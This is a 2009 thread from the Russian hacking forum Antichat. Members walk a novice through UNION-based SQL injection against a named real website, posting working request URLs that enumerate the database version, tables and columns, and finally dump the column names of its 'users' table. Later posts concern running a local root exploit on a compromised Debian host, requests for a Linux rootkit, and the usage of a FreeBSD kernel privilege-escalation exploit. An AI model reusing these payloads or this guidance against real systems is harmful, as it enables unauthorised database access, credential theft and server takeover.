ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.10.2009, 13:15
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
vot naprimer
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/*
zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??
|
|
|
31.10.2009, 13:20
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
LokbatanLi
Меня поражает ваше упорство задавать такие дурацкие вопросы...вы вообще читаете что вам люди отвечают и рекомендуют? если вы не считаете нужным следовать советам участникам форума, то зачем же тогда спрашивать?или вам всю статью про скули и раскрутку их суда переписать? Вы случаем не ошиблись? видимо из вас не то что хакера..ламера нормального не получится...
З.Ы. Прошу модеров не считать мои высказывания за флуд !
|
|
|
|
31.10.2009, 13:21
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от LokbatanLi
vot naprimer
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/*
zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??
Не совсем тебя понял, но попытаюсь предположить:
Выводимые поля: 4,5.
Вместо любого из них поставляем version(). Запрос принимает вид:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,version(),5,6,7/*
Если версия 5, значит нам доступна information_schema, tables и columns соответственно.
Опять видоизменяем запрос. Допустим, нужно увидеть имя первой таблицы. Тогда:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables/*
Чтобы увидеть остальные - используем LIMIT, group_concat и иже с ними. Как именно - ищем на этом форуме, всё подробно описано.
Далее - хотим узнать имя колонки. Делаем запрос:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns/*
Нужную перебираем тем же способом, что и имена таблиц.
Я тебя правильно понял, или всё ещё нет?
|
|
|
|
31.10.2009, 13:24
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
offf blin zdes est nomerki 4,5 a esli bi ix ne bival 4to zdelali?? kak mojem uznat v kakom nomere sidyat columns name
|
|
|
|
31.10.2009, 13:28
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
LokbatanLi ну ты ёпрст задолбал уже..нет вывода ..значит крути как слепую...я тебе же написал выше...
З.Ы. В таджикистоне тоже каникулы?
|
|
|
|
31.10.2009, 13:28
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Вот рабочий пример для твоей ссылки:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,group_concat(0x20,column_name),6,7+from+information_schema.columns+where+table_name=0x7573657273/*
Вывод колонок из таблицы "users' (0x7573657273 - имя таблицы в hex). |
|
|
|
31.10.2009, 13:32
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Gorev, nu pocti ti menya i ya tebya ponel kak blind sql budet??
|
|
|
|
31.10.2009, 13:33
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от LokbatanLi
Gorev, nu pocti ti menya i ya tebya ponel kak blind sql budet??
Blind-injection рассмотрена в статье, ссылку на которую я давал несколькими постами выше.
|
|
|
|
31.10.2009, 14:53
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Подскажите,запускаю локал рут сплойт на шеле пишет
No job control on this shell
Система Debian Linux yesclub 2.6.18-6-686. Cплойт собран на OpenSuse 11,причём её он с радостью порутал =)
В чём трабла?
P.s. я понимаю,что не хочет работать на этом шеле,вопрос почему?
P.S.S. Уффф,порутал. =)
Зыыы Посоветуйте свежий паблик (можно и не паблик =)) руткит под Linx Debian с сцылкой желательно и выложите,если у кого есть, ваниш собранный,никак не хочет компилиься. =( С меня репа =)
Последний раз редактировалось p.r0phe.t; 31.10.2009 в 16:10..
|
|
|
|
31.10.2009, 17:28
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
кто либо пользовался этим эксплойтом http://milw0rm.com/exploits/7581 ?
(FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit)
написано запускать так: usage: ./x <allproc>\n
что за параметр allproc? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
